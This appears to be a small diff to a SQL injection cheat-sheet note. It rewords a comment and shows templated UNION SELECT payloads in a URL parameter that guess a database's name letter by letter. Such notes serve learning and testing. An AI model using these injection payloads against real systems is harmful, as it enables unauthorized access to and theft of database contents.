SQL Injection

 $url/query?$column=$changedvalue' UNION SELECT $found where database() like 'b%'; #Try b

-#Repeat with every letter until found a value that gets true
+#Repeat with every letter until a value that gets true is found

 $url/query?$column=$changedvalue' UNION SELECT $found where database() like '$lettera%';